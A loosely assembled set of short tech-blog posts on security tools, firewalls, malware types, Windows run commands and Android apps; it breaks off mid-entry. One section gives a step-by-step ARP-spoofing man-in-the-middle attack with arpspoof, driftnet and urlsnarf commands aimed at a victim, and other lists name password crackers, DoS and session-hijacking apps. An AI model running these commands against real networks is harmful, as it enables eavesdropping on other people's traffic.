Top 20 Network Penetration Testing tools

1. Nessus
2. Zenmap
3. Angry IP Scanner
4. IP Scanner
5. GFI lan Guard
6. Soft Perfect Network Scanner
7. Solar Winds Network Tool
8. Global Network Inventory Scanner 9.
Superscan
10. Advanced IP Scanner
11. Retina
12. Advanced LAN Scanner
13. Emco Remote Installer SE
14. Ghost Port Scan
15. Lizard System Network Scanner
16. Yaps
17. MiTec Network Scanner
18. Lan Spy
19. Knocker
20. Local Scan

10+ greatest computer programmer

1. Ada Lovelace It may be seen as a new age
thing with millions of lines of codes and
imensely powerful computers, but one of the
pioneers of programming was a woman
named Ada Augusta King, a.k.a. Ada
Lovelace. She was a mathematician who
worked on Charles Babbage's mechanical
general purpose computer known as the
Analytical Engine.
2. Niklaus Wirth Widely recognised as one of
the pioneer's of programming, this is the
man who created languages like Pascal,
Euler, Algol and many others.
3. Bill Gates A list of influential or greatest
programmers can never be complete without
mentioning the founder and creator of
Microsoft. He has both admirers and haters,
but no one can deny his contribution.
4. James Gosling This is the man who created
the Java programming language, which is
arguably one of the most influential
languages of all time.
5. Guido van Rossum Have you heard of him?
You've definitely heard of the language he
created. This is the man behind the Python
programming language.
6. Kenneth Thompson Call him Ken because
that's what the hacker community calls him.
He has worked for Google and developed the
Go programming language while working
there. He also developed the original Unix
operating system and a programming
language called B, which was the predecessor
to the illustrious C programming language.
7. Donald Knuth This man is known as the
father of anaylsis of algorithms for his
contributions to the field of analysis and
computational complexity of algorithms.
8. Brian Kernighan He is the co-creator and
developer of the Unix, AWK and AMPL
languages.
9. Tim Berners-Lee If you don't know this
name then you should really work on
increasing your awareness. This is the man
who created the World Wide Web and hence
gave us the lives we have today.
10. Bjarne Stroustrup This man created the C
++ programming language. Yes, the language
that gave rise to so many of the best known
programs and programming languages.
11. Linus Torvalds Little needs to be said
about this man. He's the creator of the Linux
kernel, which is the base for so many
operating systems.
12. Dennis Ritchie C++ is an offspring of the
C programming language and Dennis Ritchie
is the man who created C.

web site certificates

web s

Introduction to firewalls

Firewalls are computer security systems that
protect your office/home PCs or your network
from intruders, hackers & malicious code.
Firewalls protect you from offensive software
that may come to reside on your systems or
from prying hackers. In a day and age when
online security concerns are the top priority of
the computer users, Firewalls provide you with
the necessary safety and protection.
What exactly are firewalls?
Firewalls are software programs or hardware
devices that filter the traffic that flows into
you PC or your network through a internet
connection. They sift through the data flow &
block that which they deem (based on how &
for what you have tuned the firewall) harmful
to your network or computer system.
When connected to the internet, even a
standalone PC or a network of interconnected
computers make easy targets for malicious
software & unscrupulous hackers. A firewall
can offer the security that makes you less
vulnerable and also protect your data from
being compromised or your computers being
taken hostage.
How do they work?
Firewalls are setup at every connection to the
Internet, therefore subjecting all data flow to
careful monitoring. Firewalls can also be tuned
to follow "rules". These Rules are simply
security rules that can be set up by yourself or
by the network administrators to allow traffic
to their web servers, FTP servers, Telnet
servers, thereby giving the computer owners/
administrators immense control over the
traffic that flows in & out of their systems or
networks.
Rules will decide who can connect to the
internet, what kind of connections can be
made, which or what kind of files can be
transmitted in out. Basically all traffic in & out
can be watched and controlled thus giving the
firewall installer a high level of security &
protection.
Firewall logic
Firewalls use 3 types of filtering mechanisms:
Packet filtering or packet purity
Data flow consists of packets of information
and firewalls analyze these packets to sniff out
offensive or unwanted packets depending on
what you have defined as unwanted packets.
Proxy
Firewalls in this case assume the role of a
recipient & in turn sends it to the node that
has requested the information & vice versa.
Inspection
In this case Firewalls instead of sifting through
all of the information in the packets, mark key
features in all outgoing requests & check for
the same matching characteristics in the inflow
to decide if it relevant information that is
coming through.
Firewall Rules
Firewalls rules can be customized as per your
needs, requirements & security threat levels.
You can create or disable firewall filter rules
based on such conditions as:
IP Addresses
Blocking off a certain IP address or a range of
IP addresses, which you think are predatory.
What is my IP address? Where is an IP
address located?
Domain names
You can only allow certain specific domain
names to access your systems/servers or allow
access to only some specified types of domain
names or domain name extension like .edu
or .mil.
Protocols
A firewall can decide which of the systems can
allow or have access to common protocols like
IP, SMTP, FTP, UDP,ICMP,Telnet or SNMP.
Ports
Blocking or disabling ports of servers that are
connected to the internet will help maintain
the kind of data flow you want to see it used
for & also close down possible entry points for
hackers or malignant software.
Keywords
Firewalls also can sift through the data flow
for a match of the keywords or phrases to
block out offensive or unwanted data from
flowing in.
Types of Firewall
Software firewalls
New generation Operating systems come with
built in firewalls or you can buy a firewall
software for the computer that accesses the
internet or acts as the gateway to your home
network.
Hardware firewalls
Hardware firewalls are usually routers with a
built in Ethernet card and hub. Your computer
or computers on your network connect to this
router & access the web.
Summary
Firewalls are a must have for any kind of
computer usage that go online. They protect
you from all kinds of abuse & unauthorised
access like trojans that allow taking control of
your computers by remote logins or
backdoors, virus or use your resources to
launch DOS attacks.
Firewalls are worth installing. Be it a basic
standalone system, a home network or a office
network, all face varying levels of risks &
Firewalls do a good job in mitigating these
risks. Tune the firewall for your requirements
& security levels and you have one reason less
to worry.
Some of the firewall products that you may
want to check out are:
McAfee Internet Security
Microsoft Windows Firewall
Norton Personal Firewall
Trend Micro PC-cillin
ZoneAlarm Security Suit

Share Remote Screen without any software

As we all knows Windows OS is full of hidden
programs that are only limited to developer
or geeks. Today we are going to learn about
MSRA (windows remote assistance)
executable. MSRA is windows inbuilt remote
assistance program using which you can
control remote pc’s, share remote screens,
provide remote support and much more. Lets
learn how to use MSRA for remote sharing.
Steps to Share or Control Remote PC using
MSRA:
1. First of all click on startup and type
command “MSRA” and press enter or run >
msra
2. Now you will see screen like below having
title “Windows Remote Assistance” , there are
two options displayed:
Invite someone you trust to help you :
Choose this option if you want to share your
screen with someone.
Help someone who invited you : Choose this
option if you want to control someone
others PC remotely.
Click on Option a “Invite someone you trust
to help you”
Now you can see three different options :
Send this invitation as file : On clicking this
option you can save the invitation file and
send it to anyone from which you require
help. After saving the file another window
will open containing the password. You have
to provide that password to person whom
you want to connect to your machine.
Use email to send an invitation: You can send
invitation directly via email but it requires
email client on your machine to send email
like outlook etc.
Use Easy connect: Another method to
directly connect two PC is using Easy connect
but this require some basic settings at your
routers end i.e. If the computer has IPv6
disabled or is behind a NAT router that
blocks Teredo traffic, the Easy Connect
option will be unavailable.
Now once you have send the remote
assistance invitation file to user, he can
connect to your PC by double clicking the
invitation file and then entering the
password.
Note: You need to enable remote assistance
service.
3. Help someone who invited you : By
clicking this option you can provide help to
anyone who has done the above task. You
will need two things : Invitation file and
password to connect remote PC.
Woohooo… Did you know there is another
smart option by which you can directly
connect to any PC using IP address? If not,
well lets learn that too. Yup we can also
provide windows remote assistance support
using IP address too. Here are options.
1. First of all click on startup and type
command “MSRA” and press enter.
2. Now you will see screen where two
options are displayed, Select “Help someone
who invited you”.
3. After that you will see some option, click
on the bottom one “Advanced connection
option for help desk”
After clicking option you see below panel to
enter IP address:
After entering IP address press Next to
connect to IP address.

Your Android

Android is a mobile operating system (OS)
based on the Linux kernel and currently
developed by Google. With a user interface
based on direct manipulation, Android is
designed primarily for touchscreen mobile
devices such as smartphones and tablet
computers, with specialized user interfaces
for televisions (Android TV), cars (Android
Auto), and wrist watches (Android Wear). The
OS uses touch inputs that loosely correspond
to real-world actions, like swiping, tapping,
pinching, and reverse pinching to manipulate
on-screen objects, and a virtual keyboard.
Despite being primarily designed for
touchscreen input, it also has been used in
game consoles, digital cameras, and other
electronics.
Alpha (1.0)
Beta (1.1)
Cupcake (1.5)
Donut (1.6)
Eclair (2.0–2.1)
Froyo (2.2–2.2.3)
Gingerbread (2.3–2.3.7)
Honeycomb (3.0–3.2.6)
Ice Cream Sandwich (4.0–4.0.4)
Jelly Bean (4.1–4.3.1)
KitKat (4.4–4.4.4)
As of 2011, Android has the largest installed
base of any mobile OS and as of 2013, its
devices also sell more than Windows, iOS,
and Mac OS devices combined
As of July 2013 the Google Play store has
had over 1 million Android apps published,
and over 50 billion apps downloaded.
A developer survey conducted in April–May
2013 found that 71% of mobile developers
develop for Android.
At Google I/O 2014, the company revealed
that there were over 1 billion active monthly
Android users (that have been active for 30
days), up from 538 million in June 2013.
Android's source code is released by Google
under open source licenses, although most
Android devices ultimately ship with a
combination of open source and proprietary
software

Magic cookie

A magic cookie, or just cookie for short, is a
token or short packet of data passed between
communicating programs, where the data is
typically not meaningful to the recipient
program. The contents are opaque and not
usually interpreted until the recipient passes
the cookie data back to the sender or
perhaps another program at a later time. The
cookie is often used like a ticket – to identify
a particular event or transaction
HTTP cookie
A cookie, also known as an HTTP cookie, web
cookie, or browser cookie, is a small piece of
data sent from a website and stored in a
user's web browser while the user is
browsing that website. Every time the user
loads the website, the browser sends the
cookie back to the server to notify the
website of the user's previous activity
Cookies were designed to be a reliable
mechanism for websites to remember
stateful information (such as items in a
shopping cart) or to record the user's
browsing activity (including clicking
particular buttons, logging in, or recording
which pages were visited by the user as far
back as months or years ago).

30 + Hacking tools Vulnerability Scanners

1. SAINT
2. Nipper
3. Secunia PSI
4. Retina
5. MBSA
6. QualysGuard
7. GFI LanGuard
8. Nexpose
9. Core Impact
10. OpenVAS
11. Nessus
Password Cracker
12. Brutus
13. Wfuzz
14. RainbowCrack
15. SolarWinds
16. L0phtCrack
17. Medusa
18. PwDump 6
19. AirSnort
20. THC Hydra
21. John the Ripper
22. Cain and Abel
23. Aircrack
24. Ophcrack
Anonymous Tools
25. Hotspot Shield
26. AIO Secret Maker
Game Hacking Tools
27. Art Money
28. 3D Fx Zone
29. Game Booster
30. Speed Gear
31. Cheat Engine

Command Prompt Short Keys

F1: Pastes the last executed command
(character by character)
F2: Pastes the last executed command (up to
the entered character)
F3: Pastes the last executed command
F4: Deletes current prompt text up to the
entered character
F5: Pastes recently executed commands
(does not cycle)
F6: Pastes ^Z to the prompt
F7: Displays a selectable list of previously
executed commands
F8: Pastes recently executed commands
(cycles)
F9: Asks for the number of the command
from the F7 list to paste

SAAS ( Software as a service )

Software as a service is a software licensing
and delivery model in which software is
licensed on a subscription basis and is
centrally hosted. It is sometimes referred to
as "on-demand software". SaaS is typically
accessed by users using a thin client via a
web browser. SaaS has become a common
delivery model for many business
applications, including office & messaging
software, DBMS software, management
software, CAD software, development
software, gamification, virtualization,
accounting, collaboration, customer
relationship management (CRM), management
information systems (MIS), enterprise
resource planning (ERP), invoicing, human
resource management (HRM), content
management (CM) and service desk
management. SaaS has been incorporated
into the strategy of all leading enterprise
software companies. One of the biggest
selling points for these companies is the
potential to reduce IT support costs by
outsourcing hardware and software
maintenance and support to the SaaS
provider.
According to a Gartner Group estimate, SaaS
sales in 2010 reached $10 billion, and were
projected to increase to $12.1bn in 2011, up
20.7% from 2010. Gartner Group estimates
that SaaS revenue will be more than double
its 2010 numbers by 2015 and reach a
projected $21.3bn. Customer relationship
management (CRM) continues to be the
largest market for SaaS. SaaS revenue within
the CRM market was forecast to reach
$3.8bn in 2011, up from $3.2bn in 2010.
The term "software as a service" (SaaS) is
considered to be part of the nomenclature of
cloud computing, along with infrastructure as
a service (IaaS), platform as a service (PaaS),
desktop as a service (DaaS), backend as a
service (BaaS), and information technology
management as a service (ITMaaS).

10+ linux OS for hacking-

1. Kali Linux - http://www.kali.org/
2. BackBox - http://www.backbox.org/
3. DEFT - http://www.deftlinux.net/
4. Live Hacking OS - https://
www.livehacking.com/
5. Samurai Web Security Framework - http://
sourceforge.net/projects/samurai/
6. Network Security Tool Kit - http://
sourceforge.net/projects/nst/
7. Parrot-sec Forensic OS – http://
www.parrotsec.org/index.php/Main_Page
8. Bugtraq - http://bugtraq-team.com/
9. Nodezero - http://www.nodezero-lin
ux.org/
10. Pentoo - http://www.pentoo.ch/
11. Gnacktrack - http://www.gnacktrack.c
o.uk/

Man in the middle attack-

The man-in-the-middle attack (MITM, MIM,
MITMA) in cryptography and computer security is a form of active eavesdropping in
which the attacker makes independent connections with the victims and relays messages between them, making them
believe that they are talking directly to each other over a private connection, when in fact
the entire conversation is controlled by the attacker.it means attacker is in between both
victim and watch thier messages.
required tool-
1. Arpspoof
2. Driftnet
3. Urlsnarf
Arpspoof:- We use it twice
1. To lie to the Gateway about the MAC
address of victim
MAC Address of Victim is that of Back-
Track’s
2. To lie to the Victim about the MAC address of Gateway
MAC Address of Gateway is that of Back-Track’s
Driftnet:- Displays the Graphics, that Victim browses over Internet

Urlsnarf:- Gives the details of URLs, that Victim visits
Steps for that attack-
1) To accomplish this we will modify the IP
Tables and turn Linux into a router.
cat /proc/sys/net/ipv4/ip_forward
2) The default value is “0”. It should be set
to 1. To change the value to 1 enter the
following command:
sudo echo 1 >> /proc/sys/net/ipv4/
ip_forward
3) Now go ahead and check out the
ip_forward file and make sure the value
equals “1”
cat /proc/sys/net/ipv4/ip_forward
4) An arp poisoning attack will redirect data
from the victim’s PC going to their gateway
to be redirected to our box (note you have to
be on the same physical device, such as a
switch or access point to accomplish this).
sudo arpspoof –i eth1 –t 192.168.1.138
192.168.1.1
5) We will now use another arp poisoning
attack to redirect data from the gateway
destined for the victim’s PC back to our
Linux box.
sudo arpspoof –i eth1 –t 192.168.1.1
192.168.1.137
6) Now we launch driftnet. It is listening.
sudo driftnet –i eth1
7) As the victim’s PC browsing the Internet,
images that show up in his web browser are
also displayed on the attacker’s Linux server.
8) The attacker PC launches urlsnarf. URLs
that are accessed on the victim’s PC are
displayed on the attacker’s Linux server

Ten hacking tools for android

1.SpoofApp
SpoofApp is a Caller ID Spoofing, Voice
Changing and Call Recording mobile app for
your iPhone, BlackBerry and Android phone.
It's a decent mobile app to help protect your
privacy on the phone. However, it has been
banned from the Play Store for allegedly
being in conflict with The Truth in Caller ID
Act of 2009.

2.Andosid
The DOS tool for Android Phones allows
security professionals to simulate a DOS
attack (an http post flood attack to be exact)
and of course a dDOS on a web server, from
mobile phones.

3.Faceniff
Allows you to sniff and intercept web session
profiles over the WiFi that your mobile is
connected to. It is possible to hijack sessions
only when WiFi is not using EAP, but it
should work over any private networks.

4.Nmap
Nmap (Network Mapper) is a security
scanner originally written by Gordon Lyon
used to discover hosts and services on a
computer network, thus creating a "map" of
the network. To accomplish its goal, Nmap
sends specially crafted packets to the target
host and then analyses the responses.

5.Anti-Android Network Toolkit
zANTI is a comprehensive network
diagnostics toolkit that enables complex
audits and penetration tests at the push of a
button. It provides cloud-based reporting
that walks you through simple guidelines to
ensure network safety.

6.SSHDroid
SSHDroid is a SSH server implementation for
Android. This application will let you connect
to your device from a PC and execute
commands (like "terminal" and "adb shell")
or edit files (through SFTP, WinSCP,
Cyberduck, etc).

7.WiFi Analyser
Turns your android phone into a Wi-Fi
analyser. Shows the Wi-Fi channels around
you. Helps you to find a less crowded
channel for your wireless router.

8.Network Discovery
Discover hosts and scan their ports in your
Wifi network. A great tool for testing your
network security.

9.ConnectBot
ConnectBot is a powerful open-source
Secure Shell (SSH) client. It can manage
simultaneous SSH sessions, create secure
tunnels, and copy/paste between other
applications. This client allows you to
connect to Secure Shell servers that typically
run on UNIX-based servers.

10.dSploit
Android network analysis and penetration
suite offering the most complete and
advanced professional toolkit to perform
network security assesments on a mobile
device.

What is a digital signature?

Part 1
There are different types of digital
signatures; this tip focuses on digital
signatures for email messages. You may have
received emails that have a block of letters
and numbers at the bottom of the message.
Although it may look like useless text or
some kind of error, this information is
actually a digital signature. To generate a
signature, a mathematical algorithm is used
to combine the information in a key with the
information in the message. The result is a
random-looking string of letters and
numbers.
Why would you use one?
Because it is so easy for attackers and
viruses to "spoof" email addresses , it is
sometimes difficult to identify legitimate
messages. Authenticity may be especially
important for business correspondence—if
you are relying on someone to provide or
verify information, you want to be sure that
the information is coming from the correct
source. A signed message also indicates that
changes have not been made to the content
since it was sent; any changes would cause
the signature to break.
How does it work?
Before you can understand how a digital
signature works, there are some terms you
should know:
Keys - Keys are used to create digital
signatures. For every signature, there is a
public key and a private key.
Private key - The private key is the portion of
the key you use to actually sign an email
message. The private key is protected by a
password, and you should never give your
private key to anyone.
Public key - The public key is the portion of
the key that is available to other people.
Whether you upload it to a public key ring
or send it to someone, this is the key other
people can use to check your signature. A
list of other people who have signed your
key is also included with your public key.
You will only be able to see their identities if
you already have their public keys on your
key ring.
Key ring - A key ring contains public keys.
You have a key ring that contains the keys of
people who have sent you their keys or
whose keys you have gotten from a public
key server. A public key server contains keys
of people who have chosen to upload their
keys.
What is a digital signature? Part 2

Fingerprint - When confirming a key, you will
actually be confirming the unique series of
letters and numbers that comprise the
fingerprint of the key. The fingerprint is a
different series of letters and numbers than
the chunk of information that appears at the
bottom of a signed email message.
Key certificates - When you select a key on a
key ring, you will usually see the key
certificate, which contains information about
the key, such as the key owner, the date the
key was created, and the date the key will
expire.
"Web of trust" - When someone signs your
key, they are confirming that the key
actually belongs to you. The more signatures
you collect, the stronger your key becomes.
If someone sees that your key has been
signed by other people that he or she trusts,
he or she is more inclined to trust your key.
Note: Just because someone else has trusted
a key or you find it on a public key ring does
not mean you should automatically trust it.
You should always verify the fingerprint
yourself.
The process for creating, obtaining, and
using keys is fairly straightforward:
Generate a key using software such as PGP,
which stands for Pretty Good Privacy, or
GnuPG, which stands for GNU Privacy Guard.
Increase the authenticity of your key by
having your key signed by co-workers or
other associates who also have keys. In the
process of signing your key, they will
confirm that the fingerprint on the key you
sent them belongs to you. By doing this, they
verify your identity and indicate trust in your
key.
Upload your signed key to a public key ring
so that if someone gets a message with your
signature, they can verify the digital
signature.
Digitally sign your outgoing email messages.
Most email clients have a feature to easily
add your digital signature to your message.

ABCD... OF CYBERS

A-Apple
B-Bluetooth
C-Chatting
D-Download
E-Email
F-Facebook
G-Google
H-Hotmail
I-Iphone
J-Java
K-Kingston
L-Laptop
M-Message
N-Nero
O-Orkut
P-Picasa
Q-Quick time
R-RAM
S-Server
T-TechNotification
U-USB
V-Vista
W-Wifi
X-XP
Y-Yahoo!
Z-Zorpia.

Some Useful Run Short Commands

:Example : Go > Run > Type control.exe
admintools
Accessibility Controls
access.cpl
Add Hardware Wizard
hdwwiz.cpl
Add/Remove Programs
appwiz.cpl
Administrative Tools
control.exe admintools
Automatic Updates
wuaucpl.cpl
Bluetooth Transfer Wizard
fsquirt
Calculator
calc
Certificate Manager
certmgr.msc
Character Map
charmap
Check Disk Utility
chkdsk
Clipboard Viewer
clipbrd
Command Prompt
cmd
Component Services
dcomcnfg
Computer Management
compmgmt.msc
Date and Time Properties
timedate.cpl
DDE Shares
ddeshare
Device Manager
devmgmt.msc
Direct X Control Panel (if installed)
directx.cpl
Direct X Troubleshooter
dxdiag
Disk Cleanup Utility
cleanmgr
Disk Defragment
dfrg.msc
Disk Management
diskmgmt.msc
Disk Partition Manager
diskpart
Display Properties
control.exe desktop
Display Properties
desk.cpl
Display Properties (w/Appearance Tab
Preselected)
control.exe color
Dr. Watson System Troubleshooting Utility
drwtsn32
Driver Verifier Utility
verifier
Event Viewer
eventvwr.msc
File Signature Verification Tool
sigverif
Findfast
findfast.cpl
Folders Properties
control.exe folders
Fonts
control.exe fonts
Fonts Folder
fonts
Free Cell Card Game
freecell
Game Controllers
joy.cpl
Group Policy Editor (XP Prof)
gpedit.msc
Hearts Card Game
mshearts
Iexpress Wizard
iexpress
Indexing Service
ciadv.msc
Internet Properties
inetcpl.cpl
Java Control Panel (if installed)
jpicpl32.cpl
Java Control Panel (if installed)
javaws
Keyboard Properties
control.exe keyboard
Local Security Settings
secpol.msc
Local Users and Groups
lusrmgr.msc
Logs You Out Of Windows
logoff
Microsoft Chat
winchat
Minesweeper Game
winmine
Mouse Properties
control.exe mouse
Mouse Properties
main.cpl
Network Connections
control.exe netconnections
Network Connections
ncpa.cpl
Network Setup Wizard
netsetup.cpl
Nview Desktop Manager (if installed)
nvtuicpl.cpl
Object Packager
packager
ODBC Data Source Administrator
odbccp32.cpl
On Screen Keyboard
osk
Opens AC3 Filter (if installed)
ac3filter.cpl
Password Properties
password.cpl
Performance Monitor
perfmon.msc
Performance Monitor
perfmon
Phone and Modem Options
telephon.cpl
Power Configuration
powercfg.cpl
Printers and Faxes
control.exe printers
Printers Folder
printers
Private Character Editor
eudcedit
Quicktime (If Installed)
QuickTime.cpl
Regional Settings
intl.cpl
Registry Editor
regedit
Registry Editor
regedit32
Removable Storage
ntmsmgr.msc
Removable Storage Operator Requests
ntmsoprq.msc
Resultant Set of Policy
rsop.msc
Resultant Set of Policy (XP Prof)
rsop.msc
Scanners and Cameras
sticpl.cpl
Scheduled Tasks
control.exe schedtasks
Security Center
wscui.cpl
Services
services.msc
Shared Folders
fsmgmt.msc
Shuts Down Windows
shutdown
Sounds and Audio
mmsys.cpl
Spider Solitare Card Game
spider
SQL Client Configuration
cliconfg
System Configuration Editor
sysedit
System Configuration Utility
msconfig
System File Checker Utility
sfc
System Properties
sysdm.cpl
Task Manager
taskmgr
Telnet Client
telnet
User Account Management
nusrmgr.cpl
Utility Manager
utilman
Windows Firewall
firewall.cpl
Windows Magnifier
magnify
Windows Management Infrastructure
wmimgmt.msc
Windows System Security Tool
syskey
Windows Update Launches
wupdmgr
Windows XP Tour Wizard
tourstart
Wordpad
write

Ten hacking tools for android

1.SpoofApp
SpoofApp is a Caller ID Spoofigng, Voice
Changing and Call Recording mobile app for
your iPhone, BlackBerry and Android phone.
It's a decent mobile app to help protect your
privacy on the phone. However, it has been
banned from the Play Store for allegedly
being in conflict with The Truth in Caller ID
Act of 2009.
2.Andosid
The DOS tool for Android Phones allows
security professionals to simulate a DOS
attack (an http post flood attack to be exact)
and of course a dDOS on a web server, from
mobile phones.
3.Faceniff
Allows you to sniff and intercept web session
profiles over the WiFi that your mobile is
connected to. It is possible to hijack sessions
only when WiFi is not using EAP, but it
should work over any private networks.
4.Nmap
Nmap (Network Mapper) is a security
scanner originally written by Gordon Lyon
used to discover hosts and services on a
computer network, thus creating a "map" of
the network. To accomplish its goal, Nmap
sends specially crafted packets to the target
host and then analyses the responses.
5.Anti-Android Network Toolkit
zANTI is a comprehensive network
diagnostics toolkit that enables complex
audits and penetration tests at the push of a
button. It provides cloud-based reporting
that walks you through simple guidelines to
ensure network safety.
6.SSHDroid
SSHDroid is a SSH server implementation for
Android. This application will let you connect
to your device from a PC and execute
commands (like "terminal" and "adb shell")
or edit files (through SFTP, WinSCP,
Cyberduck, etc).
7.WiFi Analyser
Turns your android phone into a Wi-Fi
analyser. Shows the Wi-Fi channels around
you. Helps you to find a less crowded
channel for your wireless router.
8.Network Discovery
Discover hosts and scan their ports in your
Wifi network. A great tool for testing your
network security.
9.ConnectBot
ConnectBot is a powerful open-source
Secure Shell (SSH) client. It can manage
simultaneous SSH sessions, create secure
tunnels, and copy/paste between other
applications. This client allows you to
connect to Secure Shell servers that typically
run on UNIX-based servers.
10.dSploit
Android network analysis and penetration
suite offering the most complete and
advanced professional toolkit to perform
network security assesments on a mobile
device.

32 bit vs 64 Bit ( For Windows users & System Administrators )

Technically x86 simply refers to a family of
processors and the instruction set they all
use. It doesn't actually say anything specific
about data sizes.
x86 started out as a 16-bit instruction set
for 16-bit processors (the 8086 and 8088
processors), then was extended to a 32-bit
instruction set for 32-bit processors (80386
and 80486), and now has been extended to a
64-bit instruction set for 64-bit processors.
It used to be written as 80x86 to reflect the
changing value in the middle of the chip
model numbers, but somewhere along the
line the 80 in the front was dropped, leaving
just x86.
Blame the Pentium and it's offspring for
changing the way in which processors were
named and marketed, although all newer
processors using Intel's x86 instruction set
are still referred to as x86, i386, or i686
compatible (which means they all use
extensions of the original 8086 instruction
set).
x64 is really the odd man out here. The first
name for the 64-bit extension to the x86 set
was called x86-64. It was later named to
AMD64 (because AMD were the ones to come
up with the 64-bit extension originally). Intel
licensed the 64-bit instruction set and
named their version EM64T. Both instruction
sets and the processors that use them are all
still considered x86.
System requirements
32 bit :- 1-gigahertz (GHz) 32-bit (x86)
processor or 64-bit (x64) processor,512 MB
of RAM
64 bit :- 1-GHz 64-bit (x64) processor, 1 GB
of RAM (4 GB recommended)
Memory access
32 bit :- A 32-bit version of Windows Vista
can access up to 4 GB of RAM.
64 bit :- A 64-bit version of Windows Vista
can access from 1 GB of RAM to more than
128 GB of RAM.
Memory access per edition
32 bit :- All 32-bit versions of Windows Vista
can access up to 4 GB of RAM.
64 bit :- Windows Vista Home Basic – 8 GB
of RAM
Windows Vista Home Premium – 16 GB of
RAM
Windows Vista Business – 128 GB of RAM or
more
Windows Vista Enterprise – 128 GB of RAM
or more
Windows Vista Ultimate – 128 GB of RAM or
more
DEP
32-bit versions of Windows Vista use a
software-based version of DEP.
64-bit versions of Windows Vista support
hardware-backed DEP.
Kernel Patch Protection (PatchGuard)
32 bit :- This feature is not available in 32-
bit versions of Windows Vista.
64 bit : - This feature is available in 64-bit
versions of Windows Vista. Kernel Patch
Protection helps prevent a malicious
program from updating the Windows Vista
kernel. This feature works by helping to
prevent a kernel-mode driver from extending
or replacing other kernel services. Also, this
feature helps prevent third-party programs
from updating (patching) any part of the
kernel.
Driver signing
32-bit versions of Windows Vista support 32-
bit drivers that are designed for Windows
Vista.
64-bit versions of Windows Vista do not
support 32-bit device drivers.
16-bit program support
32-bit versions of Windows Vista support 16-
bit programs, in part.
64-bit versions of Windows Vista do not
support 16-bit programs.
Note:-
If you value the benefits and advantages of
switching and embracing 64-bit Windows
Vista, here’s a few considerations to ponder
before making the move to install x64
Windows Vista:
64-bit device drivers may not be available
for one or more devices in the computer.
Device drivers must be digitally signed.
32-bit device drivers are not supported.
32-bit programs may not be fully compatible
with a 64-bit operating system.
It may be difficult to locate programs that
are written specifically for a 64-bit operating
system.
Not all hardware devices may be compatible
with a 64-bit version of Windows Vista.

Computer threats Malware, Spyware, Virus, Worm , Bot , Backdoor

Virus – this is a term that used to be generic.
Any bad software used to be a virus;
however, we use the term “malware” now.
We use the word “virus” to describe a
program that self-replicates after hooking
itself onto something running in Windows®.
Worm – a worm is another kind of self-
replicating program but generally doesn’t
hook itself onto a Windows process. Worms
generally are little programs that run in the
background of your system.
Trojan – software that you thought was going
to be one thing, but turns out to be
something bad. Named for the fabled “Trojan
Horse” that appeared to be a gift but in fact
carried a dangerous payload.
Drive-by download – this is probably the
most popular way to get something nasty
into your computer. Most of the time, it
comes from visiting a bad web page. That
web page exploits a weakness in your
browser and causes your system to become
infected.
Malware Actions
Malware:
This is a big catchall phrase that covers all
sorts of software with nasty intent. Not
buggy software, not programs you don’t like,
but software which is specifically written
with the intent to harm.
Once malware is in your computer, it can do
many things. Sometimes it’s only trying to
replicate itself with no harm to anyone, other
times it’s capable of doing very nasty things.
Adware – not truly malware and almost
never delivered using one of the methods
above. Adware is software that uses some
form of advertising delivery system.
Sometimes the way that advertisements are
delivered can be deceptive in that they track
or reveal more information about you than
you would like. Most of the time, you agree
to the adware tracking you when you install
the software that it comes with. Generally, it
can be removed by uninstalling the software
it was attached to.
Spyware – software that monitors your
computer and reveals collected information
to an interested party. This can be benign
when it tracks what webpages you visit; or it
can be incredibly invasive when it monitors
everything you do with your mouse and
keyboard.
Ransomware – lately a very popular way for
Internet criminals to make money. This
malware alters your system in such a way
that you’re unable to get into it normally. It
will then display some kind of screen that
demands some form of payment to have the
computer unlocked. Access to your computer
is literally ransomed by the cyber-criminal.
Scareware – software that appears to be
something legit (usually masquerading as
some tool to help fix your computer) but
when it runs it tells you that your system is
either infected or broken in some way. This
message is generally delivered in a manner
that is meant to frighten you into doing
something. The software claims to be able to
fix your problems if you pay them.
Scareware is also referred to as “rogue”
software – like rogue antivirus.
Bots
"Bot" is derived from the word "robot" and
is an automated process that interacts with
other network services. Bots often automate
tasks and provide information or services
that would otherwise be conducted by a
human being. A typical use of bots is to
gather information (such as web crawlers),
or interact automatically with instant
messaging (IM), Internet Relay Chat (IRC), or
other web interfaces. They may also be used
to interact dynamically with websites.
Bots can be used for either good or
malicious intent. A malicious bot is self-
propagating malware designed to infect a
host and connect back to a central server or
servers that act as a command and control
(C&C) center for an entire network of
compromised devices, or "botnet." With a
botnet, attackers can launch broad-based,
"remote-control," flood-type attacks against
their target(s). In addition to the worm-like
ability to self-propagate, bots can include the
ability to log keystrokes, gather passwords,
capture and analyze packets, gather financial
information, launch DoS attacks, relay spam,
and open back doors on the infected host.
Bots have all the advantages of worms, but
are generally much more versatile in their
infection vector, and are often modified
within hours of publication of a new exploit.
They have been known to exploit back doors
opened by worms and viruses, which allows
them to access networks that have good
perimeter control. Bots rarely announce
their presence with high scan rates, which
damage network infrastructure; instead they
infect networks in a way that escapes
immediate notice.
Exploit
An exploit is a piece of software, a
command, or a methodology that attacks a
particular security vulnerability. Exploits are
not always malicious in intent—they are
sometimes used only as a way of
demonstrating that a vulnerability exists.
However, they are a common component of
malware.
Back Door
A back door is an undocumented way of
accessing a system, bypassing the normal
authentication mechanisms. Some back doors
are placed in the software by the original
programmer and others are placed on
systems through a system compromise, such
as a virus or worm. Usually, attackers use
back doors for easier and continued access
to a system after it has been compromised.

Meaning of HTTP Status Codes

HTTP, Hypertext Transfer Protocol, is the
method by
which clients (i.e. you) and servers
communicate.
When someone clicks a link, types in a URL
or submits
out a form, their browser sends a request to
a server
for information. It might be asking for a
page, or
sending data, but either way, that is called
an HTTP
Request. When a server receives that request,
it sends
back an HTTP Response, with information for
the
client.
Usually, this is invisible, though I'm sure
you've seen
one of the very common Response codes -
404,
indicating a page was not found. There are a
fair few
more status codes sent by servers, and the
following
is a list of the current ones in HTTP 1.1,
along with an
explanation of their meanings.

Acunetix

Acunetix has a free and paid version. This
hacking tool has many uses but in essence it
tests and reports on SQL injection and Cross
Site scripting testing. It has a state of the art
crawler technology which includes a client
script analyzer engine. This security tool
generates detailed reports that identify
security issues and vulnerabilities. The latest
version, Acunetix WVS version 8, includes
several security features such as a new
module that tests slow HTTP Denial of
Service. This latest version also ships with a
compliance report template for ISO 27001.
This is useful for penetration testers and
developers since it allows organizations to
validate that their web applications are ISO
27001 compliant

Aircrack-ng

Aircrack-ng is a comprehensive set of
network security tools that includes,
aircrack-ng (which can cracks WEP and WPA
